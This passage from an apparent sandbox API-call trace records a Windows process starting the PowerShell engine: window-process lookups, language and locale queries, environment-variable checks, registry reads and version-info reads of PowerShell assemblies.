hWnd=0x10052, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.829] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x428 [0046.829] GetWindowThreadProcessId (in: hWnd=0x20246, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x9a8 [0046.829] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.830] GetWindowThreadProcessId (in: hWnd=0x301a2, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x8c0 [0046.830] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x530 [0046.830] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x678 [0046.830] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x7e0 [0046.830] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x4fc [0046.830] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x28c [0046.830] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x560 [0046.830] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x2b0 [0046.830] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x5c4 [0046.830] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x7c8 [0046.830] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x214 [0046.830] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x460 [0046.830] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x7f8 [0046.830] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x90 [0046.831] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x730 [0046.831] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x228 [0046.831] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x35c [0046.831] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x7a0 [0046.831] GetWindowThreadProcessId (in: hWnd=0x90154, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x670 [0046.831] GetWindowThreadProcessId (in: hWnd=0x3010e, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x348 [0046.831] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6b0 [0046.831] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6d4 [0046.831] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x6a4 [0046.831] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x54c [0046.831] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x43c [0046.831] GetWindowThreadProcessId (in: hWnd=0x20108, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x5a4 [0046.832] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x4f0 [0046.832] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x66c [0046.832] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x3a0 [0046.832] GetWindowThreadProcessId (in: hWnd=0x200fe, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x3a0 [0046.832] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x26dbc0 | out: lpdwProcessId=0x26dbc0) returned 0x688 [0046.838] WerSetFlags () returned 0x0 [0046.850] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0046.850] CoTaskMemFree (pv=0x0) [0046.851] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26df28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26df20 | out: pulNumLanguages=0x26df28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26df20) returned 1 [0046.852] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26df28, pwszLanguagesBuffer=0x2c781c8, pcchLanguagesBuffer=0x26df20 | out: pulNumLanguages=0x26df28, pwszLanguagesBuffer=0x2c781c8, pcchLanguagesBuffer=0x26df20) returned 1 [0046.859] CoTaskMemAlloc (cb=0x24) returned 0x49cd90 [0046.859] GetUserDefaultLocaleName (in: lpLocaleName=0x49cd90, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0046.859] CoTaskMemFree (pv=0x49cd90) [0046.880] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0046.881] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.881] CoTaskMemFree (pv=0x1b852880) [0046.885] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0046.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.885] CoTaskMemFree (pv=0x1b852880) [0046.887] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0046.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.888] CoTaskMemFree (pv=0x1b852880) [0046.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.899] SetErrorMode (uMode=0x1) returned 0x1 [0046.900] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26dba0 | out: lpFileInformation=0x26dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0046.900] SetErrorMode (uMode=0x1) returned 0x1 [0046.900] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26de10 | out: lpdwHandle=0x26de10) returned 0x94c [0046.901] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c7ba58 | out: lpData=0x2c7ba58) returned 1 [0046.901] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dd88, puLen=0x26dd80 | out: lplpBuffer=0x26dd88*=0x2c7baf4, puLen=0x26dd80) returned 1 [0046.901] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2c7bbd0, puLen=0x26dcf0) returned 1 [0046.901] lstrlenW (lpString="Microsoft Corporation") returned 21 [0046.901] CoTaskMemAlloc (cb=0x2e) returned 0x4aac50 [0046.901] lstrcpyW (in: lpString1=0x4aac50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0046.901] CoTaskMemFree (pv=0x4aac50) [0046.902] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2c7bc24, puLen=0x26dcf0) returned 1 [0046.902] lstrlenW (lpString="System.Management.Automation") returned 28 [0046.902] CoTaskMemAlloc (cb=0x3c) returned 0x4ace50 [0046.902] lstrcpyW (in: lpString1=0x4ace50, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0046.902] CoTaskMemFree (pv=0x4ace50) [0046.902] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2c7bc80, puLen=0x26dcf0) returned 1 [0046.902] lstrlenW (lpString="6.1.7601.17514") returned 14 [0046.902] CoTaskMemAlloc (cb=0x20) returned 0x4a40b0 [0046.902] lstrcpyW (in: lpString1=0x4a40b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0046.902] CoTaskMemFree (pv=0x4a40b0) [0046.902] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2c7bcc0, puLen=0x26dcf0) returned 1 [0046.902] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0046.902] CoTaskMemAlloc (cb=0x44) returned 0x4ace50 [0046.902] lstrcpyW (in: lpString1=0x4ace50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0046.902] CoTaskMemFree (pv=0x4ace50) [0046.902] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2c7bd28, puLen=0x26dcf0) returned 1 [0046.902] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0046.902] CoTaskMemAlloc (cb=0x76) returned 0x431410 [0046.902] lstrcpyW (in: lpString1=0x431410, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0046.902] CoTaskMemFree (pv=0x431410) [0046.902] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2c7bdc4, puLen=0x26dcf0) returned 1 [0046.902] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0046.902] CoTaskMemAlloc (cb=0x44) returned 0x4ace50 [0046.902] lstrcpyW (in: lpString1=0x4ace50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0046.902] CoTaskMemFree (pv=0x4ace50) [0046.902] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2c7be28, puLen=0x26dcf0) returned 1 [0046.902] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0046.902] CoTaskMemAlloc (cb=0x58) returned 0x458350 [0046.902] lstrcpyW (in: lpString1=0x458350, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0046.902] CoTaskMemFree (pv=0x458350) [0046.902] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2c7bea4, puLen=0x26dcf0) returned 1 [0046.902] lstrlenW (lpString="6.1.7601.17514") returned 14 [0046.902] CoTaskMemAlloc (cb=0x20) returned 0x4a40b0 [0046.902] lstrcpyW (in: lpString1=0x4a40b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0046.902] CoTaskMemFree (pv=0x4a40b0) [0046.902] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2c7bb4c, puLen=0x26dcf0) returned 1 [0046.902] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0046.902] CoTaskMemAlloc (cb=0x66) returned 0x4108f0 [0046.902] lstrcpyW (in: lpString1=0x4108f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0046.903] CoTaskMemFree (pv=0x4108f0) [0046.903] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x0, puLen=0x26dcf0) returned 0 [0046.903] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x0, puLen=0x26dcf0) returned 0 [0046.903] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x0, puLen=0x26dcf0) returned 0 [0046.903] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dcc8, puLen=0x26dcc0 | out: lplpBuffer=0x26dcc8*=0x2c7baf4, puLen=0x26dcc0) returned 1 [0046.903] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0046.903] VerLanguageNameW (in: wLang=0x0, szLang=0x43d430, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0046.903] CoTaskMemFree (pv=0x43d430) [0046.903] VerQueryValueW (in: pBlock=0x2c7ba58, lpSubBlock="\\", lplpBuffer=0x26dd18, puLen=0x26dd10 | out: lplpBuffer=0x26dd18*=0x2c7ba80, puLen=0x26dd10) returned 1 [0046.909] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0046.909] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.913] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.917] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dbe8 | out: phkResult=0x26dbe8*=0x308) returned 0x0 [0046.918] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dbd8 | out: phkResult=0x26dbd8*=0x30c) returned 0x0 [0046.918] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dc68 | out: phkResult=0x26dc68*=0x310) returned 0x0 [0046.922] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26dbac, lpData=0x0, lpcbData=0x26dba8*=0x0 | out: lpType=0x26dbac*=0x1, lpData=0x0, lpcbData=0x26dba8*=0x56) returned 0x0 [0046.922] CoTaskMemAlloc (cb=0x5a) returned 0x410a40 [0046.923] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26db7c, lpData=0x410a40, lpcbData=0x26db78*=0x56 | out: lpType=0x26db7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26db78*=0x56) returned 0x0 [0046.923] CoTaskMemFree (pv=0x410a40) [0046.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.954] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0046.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.954] CoTaskMemFree (pv=0x1b852880) [0047.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0047.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0047.206] CoTaskMemAlloc (cb=0x104) returned 0x1b852990 [0047.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.206] CoTaskMemFree (pv=0x1b852990) [0047.206] CoTaskMemAlloc (cb=0x104) returned 0x1b852990 [0047.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.206] CoTaskMemFree (pv=0x1b852990) [0047.235] CoTaskMemAlloc (cb=0x104) returned 0x1b852990 [0047.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.235] CoTaskMemFree (pv=0x1b852990) [0047.236] CoTaskMemAlloc (cb=0x104) returned 0x1b852990 [0047.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.236] CoTaskMemFree (pv=0x1b852990) [0047.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.236] CoTaskMemFree (pv=0x1b852990) [0047.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0047.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0047.353] CoTaskMemAlloc (cb=0x104) returned 0x1b852990 [0047.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.353] CoTaskMemFree (pv=0x1b852990) [0047.357] CoTaskMemAlloc (cb=0x104) returned 0x1b852990 [0047.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.357] CoTaskMemFree (pv=0x1b852990) [0047.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0047.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0047.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0047.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0047.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0047.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0047.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0047.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0048.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0048.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0048.112] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.112] CoTaskMemFree (pv=0x1b852bb0) [0048.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d8c0, lpFilePart=0x0 